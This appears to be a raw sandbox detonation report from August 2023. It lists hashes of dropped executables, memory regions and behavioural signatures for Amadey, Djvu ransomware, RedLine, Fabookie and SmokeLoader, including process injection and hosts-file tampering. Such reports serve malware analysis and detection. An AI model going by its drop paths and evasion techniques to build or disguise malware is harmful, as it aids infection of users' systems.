MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\66BD.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/2624-274-0x0000000000670000-0x00000000006A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\66BD.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/2624-275-0x0000000000400000-0x000000000043F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\latestplayer.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/4068-260-0x00007FF7A0550000-0x00007FF7A05A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 c7b401d619b0faaef225ea869d8b1e3d
SHA1 e0dc66a08d27d91d25ff67588b9671164f95b885
SHA256 8897fe3056c84f9fffe815153fbc04bce159c8c4e913c74648c64ad84d3f1f25
SHA512 5144d42da3595d7741889172ef0a4109395f92b91d8d904667a3e4e998e838616b49cb863331c311eb4e17cf17eaf64e80b9aca02fb3238af1ed8edd3c4caa0b

memory/2624-280-0x00000000722C0000-0x00000000729AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/2624-284-0x0000000002300000-0x0000000002306000-memory.dmp

memory/1336-285-0x0000000002090000-0x00000000020A5000-memory.dmp

memory/1336-286-0x00000000020F0000-0x00000000020F9000-memory.dmp

memory/2624-289-0x0000000009EA0000-0x000000000A4A6000-memory.dmp

memory/1336-291-0x0000000000400000-0x0000000002061000-memory.dmp

memory/2624-292-0x000000000A4B0000-0x000000000A5BA000-memory.dmp

memory/2624-294-0x000000000A5C0000-0x000000000A5D2000-memory.dmp

memory/2624-295-0x0000000004A10000-0x0000000004A20000-memory.dmp

C:\Users\Admin\AppData\Local\70d15f63-82c7-494f-84ba-94633b2cacef\56A.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\741C.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\741C.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/2624-300-0x000000000A5E0000-0x000000000A61E000-memory.dmp

memory/2624-301-0x000000000A690000-0x000000000A6DB000-memory.dmp

memory/2532-302-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7BED.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\7BED.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\7BED.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

memory/4068-310-0x00000000030F0000-0x0000000003260000-memory.dmp

memory/4068-311-0x0000000003260000-0x0000000003391000-memory.dmp

memory/3344-312-0x0000000004B20000-0x0000000004B36000-memory.dmp

memory/1336-314-0x0000000000400000-0x0000000002061000-memory.dmp

memory/2596-319-0x0000000003CB0000-0x0000000003CEF000-memory.dmp

memory/2596-318-0x0000000003B30000-0x0000000003B59000-memory.dmp

memory/2596-321-0x0000000003F80000-0x0000000003FB8000-memory.dmp

memory/2596-322-0x0000000006720000-0x0000000006730000-memory.dmp

memory/2596-320-0x0000000000400000-0x0000000002075000-memory.dmp

memory/2596-324-0x0000000006730000-0x0000000006C2E000-memory.dmp

memory/2596-325-0x00000000722C0000-0x00000000729AE000-memory.dmp

memory/2624-323-0x00000000722C0000-0x00000000729AE000-memory.dmp

memory/2596-326-0x0000000006620000-0x0000000006654000-memory.dmp

memory/2596-328-0x0000000006C30000-0x0000000006CC2000-memory.dmp

memory/2596-327-0x0000000000400000-0x0000000002075000-memory.dmp

memory/2596-329-0x0000000006720000-0x0000000006730000-memory.dmp

memory/2596-330-0x0000000006720000-0x0000000006730000-memory.dmp

memory/2624-331-0x000000000A7D0000-0x000000000A846000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9A34.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

memory/3836-336-0x0000000000400000-0x0000000002075000-memory.dmp

C:\Users\Admin\AppData\Roaming\fjuisiv

MD5 ae56a12358d405bd32ac9acdd69df14d
SHA1 5e08e2eeb8de712f774c3e6d5a3485558b841f69
SHA256 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc
SHA512 397216702d064c43ce83cffca9e816c4d72e15178ae495e1115b5b4101071a934a45fcea526c12333bcb8a7ce4ee9a5eb7e889b8cd1535b0430386630e43220e

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

\Users\Admin\AppData\Local\Temp\9A34.dll

MD5 d70e50962b1d5ecff90868916568100e
SHA1 db9daf267c3d92df4840fe388b787d5e7dc56f9e
SHA256 de1d61643576b247962b95327895cf7c137019853330a405b173ba25a0281e4b
SHA512 f11fd52c5bd8021cca6a5f8d324d183915cb60893e4a8ecef7cb3455cb2fa2079ce8093daa35f812d31bb46a231bbaa023dba1341b5a33a1954caae4e8b090bf

memory/3836-351-0x0000000000400000-0x0000000002075000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\B30D.exe

MD5 23500d2528c34a2c75782a0fccbd880f
SHA1 5dc88f3f40c51489c1f7ae66d862d4047ef98a57
SHA256 2436580f50aa36271e880c712fbedd18fbcfe9d854274829301f67f782950305
SHA512 f8a6fea58f595c1843fc8418382a48cf81730c12212b52eb1f75be71cf72ae5b0d104608a34f3c072ee6fd01e84c74eeb58a9669a0c9d7df813e0fa9b169e66f

C:\Users\Admin\AppData\Local\Temp\B30D.exe

MD5 23500d2528c34a2c75782a0fccbd880f
SHA1 5dc88f3f40c51489c1f7ae66d862d4047ef98a57
SHA256 2436580f50aa36271e880c712fbedd18fbcfe9d854274829301f67f782950305
SHA512 f8a6fea58f595c1843fc8418382a48cf81730c12212b52eb1f75be71cf72ae5b0d104608a34f3c072ee6fd01e84c74eeb58a9669a0c9d7df813e0fa9b169e66f

C:\Users\Admin\AppData\Roaming\fjuisiv

MD5 ae56a12358d405bd32ac9acdd69df14d
SHA1 5e08e2eeb8de712f774c3e6d5a3485558b841f69
SHA256 76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc
SHA512 397216702d064c43ce83cffca9e816c4d72e15178ae495e1115b5b4101071a934a45fcea526c12333bcb8a7ce4ee9a5eb7e889b8cd1535b0430386630e43220e

memory/2596-362-0x0000000000400000-0x0000000002075000-memory.dmp

C:\Users\Admin\AppData\Local\70d15f63-82c7-494f-84ba-94633b2cacef\56A.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\B8EA.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

C:\Users\Admin\AppData\Local\Temp\B8EA.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

C:\Users\Admin\AppData\Local\Temp\B8EA.exe

MD5 475b6fa46a9760f93e26085d68fa802b
SHA1 327dbd8241d7f02608b0dd464a7ca98db4306efd
SHA256 e6b243bb67b16d704a5bc586422f084f411f1cd3db3778f112ff74520bdb1be3
SHA512 2dc51a122fb301e342e7a13fd964b4e84f6dcebd6c8dfd086dcf41425f21558591a144b6c370c1119e23ebe357f496df11e65c5ee3a8677866c01d9e6343bc66

memory/3344-376-0x0000000000B90000-0x0000000000BA0000-memory.dmp

memory/3344-377-0x00000000010B0000-0x00000000010C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\56A.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\DD5B.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Roaming\btuisiv

MD5 23500d2528c34a2c75782a0fccbd880f
SHA1 5dc88f3f40c51489c1f7ae66d862d4047ef98a57
SHA256 2436580f50aa36271e880c712fbedd18fbcfe9d854274829301f67f782950305
SHA512 f8a6fea58f595c1843fc8418382a48cf81730c12212b52eb1f75be71cf72ae5b0d104608a34f3c072ee6fd01e84c74eeb58a9669a0c9d7df813e0fa9b169e66f

C:\Users\Admin\AppData\Local\Temp\F2A.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\F2A.exe

MD5 c2ca868ecfdd5ee7a6d4143890a29872
SHA1 004c581ea52c199b9aa3150f282aeb99d79104cc
SHA256 d440158b91d965693007b539131704b3bdd72e864b5adc1c0e230213acd3d97b
SHA512 2be918feea01882fe48cffd1df55a7cfe106f94dd20f6aa972728ddc00056aaabfd1fa493847844ac0746fd4b47818f284d4b4029d432330c0d8f60792e81ce2

C:\Users\Admin\AppData\Local\Temp\5351.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1c667236b307c4f3912140e0210fb292
SHA1 beb87808f71804c1974e9157b7fa10ac8d90b406
SHA256 62fc619b0287ebbfb42a684815fef2eb55d2dc0233b8534338776b3208d275a0
SHA512 8f47740e7a81306294bc097672b83619eb4a7d61616f5a6fb39aebb1cccb38edd0169fc2af733cae013a8e22b067a12d1adaaa45c15a89e894e1349f2c98a4c3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 f7dcb24540769805e5bb30d193944dce
SHA1 e26c583c562293356794937d9e2e6155d15449ee
SHA256 6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea
SHA512 cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 802b7992b634b8cb8eae916015536e1b
SHA1 ddbf0933cf5e0051a3feaf6aa82de9008de71801
SHA256 16eded867e96946d4ed35ea0561457893a61ef11da70c3afb1570bd47e86bde3
SHA512 14f2fda7c57a8345bfcdc59692394b6c72b2d2a8c860f0f67c44cefbcdbff1e0a39a954fe7ab8b323302549a9ecf6ae7e15ef517a7eec933a56a704277a9828d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 27a6981523fb99bedaf3f0213d40ce14
SHA1 a9ee004625620bf2f3cef361085793ab194dc65f
SHA256 8bee4786fdf1aced1f6c7f2126e5ac865d9e060e2ee4ae9b5fc9ecf06932d9ba
SHA512 68605e963980ffeff1b490d2cb83ff7621abd33ad02c3ed66e4e6ba6f965776a361e7486e09adee544b7d6c35224bc86644d6e4246fd3d2acff8999f7a2f38aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 cde3004d458a86374c76b63425fc9b8c
SHA1 91ed2720991b113dc6ee6b5705ec24b270e081df
SHA256 3851e2bff744375020167c2341984024cb6ee0e3d120685ad3e984125bb11447
SHA512 9ee9bd7550fb17ae13920ffd7a803727a35d823132f0fbe216d8bbbb09959cc673221d58e1f1b81909a634effedfb74ef29b3e0278a37590d2550db9b6d5cb5f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 8893aa4704488c9e37777a5ac5d4917e
SHA1 f54a3e28d3928d3a02c8581149243edbcd1dcfb6
SHA256 7af5e55c8f2c33f33fcc18743c687b52ae559a0a9b89b2dd5c7eb4577ad3168f
SHA512 15508b3a4ebe4133706595c3dce700fc99e54a9af86a25cd50fc8de3499a2af253c807945bb84726a3188e402aae39660a2066d6bd337f347bc5d6d267e1a032

C:\Users\Admin\AppData\Local\Temp\66BD.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\5351.exe

MD5 2475ec85193247eebd6fabd88ed25130
SHA1 da415fbf5ccedc8761b4438ac5818483e1b37fa9
SHA256 36711de0c30b8b0984d9848a18c0c78c6e7116df10e26bac1773c592cd395c8a
SHA512 6cea1493cfb0343cf5c4d11bdbaf6f627944714dcddcf39581142b96200fa0c6cb44abb9b06a94117aa96f8fbbab4f8fdd450ea3d27f911fcc581b9e0b0a1219

C:\Users\Admin\AppData\Local\Temp\66BD.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\741C.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\7BED.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\7BED.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\A6B8.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Local\Temp\741C.exe

MD5 9fa2359e60033bce831a4c5004e4e9f3
SHA1 ff4c3cd348e738dd29bf4e73163691e5d0396a9b
SHA256 78c6c2a433d690c77c16797cd2806d3eb83245de6110389da0611fcb6b336e09
SHA512 1cb5b58b3dfff1aa2b16eeb41c7d14bfcde59b948c34691abe55cf2986cff33137fa59627ed44f76f9a41a7ced6946c3f53aa82cb87041e09f5ee95472d44cc3

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\b0336122-c029-4316-b2ae-4e0ff6ceea31\build2.exe

MD5 304dcbfad357a684b36d2d639cdbc3eb
SHA1 428c58d8c86c49e28bc9958608817bf6a97dd780
SHA256 bd5aff6936d77e3deae4e45195b44ec5d4e7ba4f2a9dfe68ee7d6f7be2cfd97a
SHA512 8dd618a8a22c3e7f0f19287c6ca8135959f34f30a5d2e19f10f71c45a6b7c8c7dc0900b3e23c3ae479455cd1ce94a744c0841c26bde28f28ef8552130d465d43

C:\ProgramData\50799991933630022105233183

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Analysis: behavioral3

Detonation Overview

Submitted

2023-08-07 11:48

Reported

2023-08-07 11:58

Platform

win10v2004-20230703-en

Max time kernel

600s

Max time network

602s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 2180 created 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 4360 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 3988 created 3144 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 3988 created 3144 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 3988 created 3144 N/A C:\Windows\System32\conhost.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 1616 created 3144 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3D65.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\40B2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4268.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5EFB.exe N/A
